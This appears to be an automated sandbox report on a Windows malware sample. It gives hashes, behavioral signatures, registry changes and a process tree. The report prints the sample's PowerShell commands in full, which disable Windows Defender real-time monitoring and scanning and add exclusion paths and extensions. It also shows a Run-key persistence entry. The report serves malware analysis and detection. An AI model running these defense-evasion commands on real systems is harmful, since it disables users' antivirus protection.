Analysis
-
max time kernel
146s -
max time network
148s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
28-06-2024 16:41
Behavioral task
behavioral1
Sample
c4e10100c5cf7bec2d9d0a1d7203ddb2.exe
Resource
win7-20240221-en
General
-
Target
c4e10100c5cf7bec2d9d0a1d7203ddb2.exe
-
Size
405KB
-
MD5
c4e10100c5cf7bec2d9d0a1d7203ddb2
-
SHA1
24a6ecd52fb2165b8563a2853898316851638871
-
SHA256
fdc933b64df0832a1f88f0e19a4cab67fb110d54c4913367a7215d7890f8a5b7
-
SHA512
ff6bd9bdcb95641c5e19aeef99d9cdddb33b5b309ec358a1a50ba00d2cea9a3fa22a0239b4e09d4a8904d4b7f470bbc621d5e0d60331bc5800709d308faf3202
-
SSDEEP
6144:0NYzj2jBoO33tq6qbXaYBc1g5aN9KBBBBBBByygHG/bZbYdNpmIU:eYzAq81g5aN+BoKD
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepid process 2608 powershell.exe 500 powershell.exe 1632 powershell.exe 2880 powershell.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
c4e10100c5cf7bec2d9d0a1d7203ddb2.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Windows\CurrentVersion\Run\JkanJjJrabo = "C:\\Users\\Admin\\AppData\\Local\\Temp\\c4e10100c5cf7bec2d9d0a1d7203ddb2.exe" c4e10100c5cf7bec2d9d0a1d7203ddb2.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 9 IoCs
Processes:
c4e10100c5cf7bec2d9d0a1d7203ddb2.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\ms-settings\shell\open c4e10100c5cf7bec2d9d0a1d7203ddb2.exe Set value (str) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\ms-settings\shell\open\command\ c4e10100c5cf7bec2d9d0a1d7203ddb2.exe Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\ms-settings\shell\open\command c4e10100c5cf7bec2d9d0a1d7203ddb2.exe Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\ms-settings\shell c4e10100c5cf7bec2d9d0a1d7203ddb2.exe Key deleted \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\ms-settings\shell\open\command c4e10100c5cf7bec2d9d0a1d7203ddb2.exe Key deleted \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\ms-settings\shell\open c4e10100c5cf7bec2d9d0a1d7203ddb2.exe Key deleted \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\ms-settings\shell c4e10100c5cf7bec2d9d0a1d7203ddb2.exe Key deleted \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\ms-settings c4e10100c5cf7bec2d9d0a1d7203ddb2.exe Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\ms-settings c4e10100c5cf7bec2d9d0a1d7203ddb2.exe -
Suspicious behavior: EnumeratesProcesses 7 IoCs
Processes:
c4e10100c5cf7bec2d9d0a1d7203ddb2.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 2156 c4e10100c5cf7bec2d9d0a1d7203ddb2.exe 2824 powershell.exe 2644 powershell.exe 2608 powershell.exe 500 powershell.exe 1632 powershell.exe 2880 powershell.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
c4e10100c5cf7bec2d9d0a1d7203ddb2.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 2156 c4e10100c5cf7bec2d9d0a1d7203ddb2.exe Token: SeDebugPrivilege 2824 powershell.exe Token: SeDebugPrivilege 2644 powershell.exe Token: SeDebugPrivilege 2608 powershell.exe Token: SeDebugPrivilege 500 powershell.exe Token: SeDebugPrivilege 1632 powershell.exe Token: SeDebugPrivilege 2880 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
c4e10100c5cf7bec2d9d0a1d7203ddb2.exepid process 2156 c4e10100c5cf7bec2d9d0a1d7203ddb2.exe -
Suspicious use of WriteProcessMemory 24 IoCs
Processes:
c4e10100c5cf7bec2d9d0a1d7203ddb2.execmd.execmd.exedescription pid process target process PID 2156 wrote to memory of 2052 2156 c4e10100c5cf7bec2d9d0a1d7203ddb2.exe cmd.exe PID 2156 wrote to memory of 2052 2156 c4e10100c5cf7bec2d9d0a1d7203ddb2.exe cmd.exe PID 2156 wrote to memory of 2052 2156 c4e10100c5cf7bec2d9d0a1d7203ddb2.exe cmd.exe PID 2156 wrote to memory of 3012 2156 c4e10100c5cf7bec2d9d0a1d7203ddb2.exe cmd.exe PID 2156 wrote to memory of 3012 2156 c4e10100c5cf7bec2d9d0a1d7203ddb2.exe cmd.exe PID 2156 wrote to memory of 3012 2156 c4e10100c5cf7bec2d9d0a1d7203ddb2.exe cmd.exe PID 2052 wrote to memory of 2608 2052 cmd.exe powershell.exe PID 2052 wrote to memory of 2608 2052 cmd.exe powershell.exe PID 2052 wrote to memory of 2608 2052 cmd.exe powershell.exe PID 3012 wrote to memory of 2644 3012 cmd.exe powershell.exe PID 3012 wrote to memory of 2644 3012 cmd.exe powershell.exe PID 3012 wrote to memory of 2644 3012 cmd.exe powershell.exe PID 3012 wrote to memory of 2824 3012 cmd.exe powershell.exe PID 3012 wrote to memory of 2824 3012 cmd.exe powershell.exe PID 3012 wrote to memory of 2824 3012 cmd.exe powershell.exe PID 3012 wrote to memory of 500 3012 cmd.exe powershell.exe PID 3012 wrote to memory of 500 3012 cmd.exe powershell.exe PID 3012 wrote to memory of 500 3012 cmd.exe powershell.exe PID 3012 wrote to memory of 1632 3012 cmd.exe powershell.exe PID 3012 wrote to memory of 1632 3012 cmd.exe powershell.exe PID 3012 wrote to memory of 1632 3012 cmd.exe powershell.exe PID 3012 wrote to memory of 2880 3012 cmd.exe powershell.exe PID 3012 wrote to memory of 2880 3012 cmd.exe powershell.exe PID 3012 wrote to memory of 2880 3012 cmd.exe powershell.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\c4e10100c5cf7bec2d9d0a1d7203ddb2.exe"C:\Users\Admin\AppData\Local\Temp\c4e10100c5cf7bec2d9d0a1d7203ddb2.exe"1⤵
- Adds Run key to start application
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2156 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\c4e10100c5cf7bec2d9d0a1d7203ddb2.exe & exit2⤵
- Suspicious use of WriteProcessMemory
PID:2052 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\c4e10100c5cf7bec2d9d0a1d7203ddb2.exe3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2608 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start /b powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\AppData" & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\Local" & powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe'" & exit2⤵
- Suspicious use of WriteProcessMemory
PID:3012 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2644 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -SubmitSamplesConsent 23⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2824 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\Admin\AppData"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:500 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\Admin\Local"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1632 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -ExclusionExtension '.exe'"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2880
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\Y070IKWTL0KLCYZJSBAR.temp
Filesize7KB
MD5bb96597420ee22a94859bbb917f660f6
SHA11fa36f615713ccb0cc2bb3937a69ee20e4a37fcf
SHA2562522dea1eae3b7a5968edd61c844c8ce6ed867390d744594f7313c1e22499000
SHA51200dac3599231bc32fd59ded0848dc78354e06e56c6db39f4b3f64a6b4e20011d56267c7fd30fe967cf72e94c61e9880b0d2b8b7c8f4110149e8eea0c198e2e1b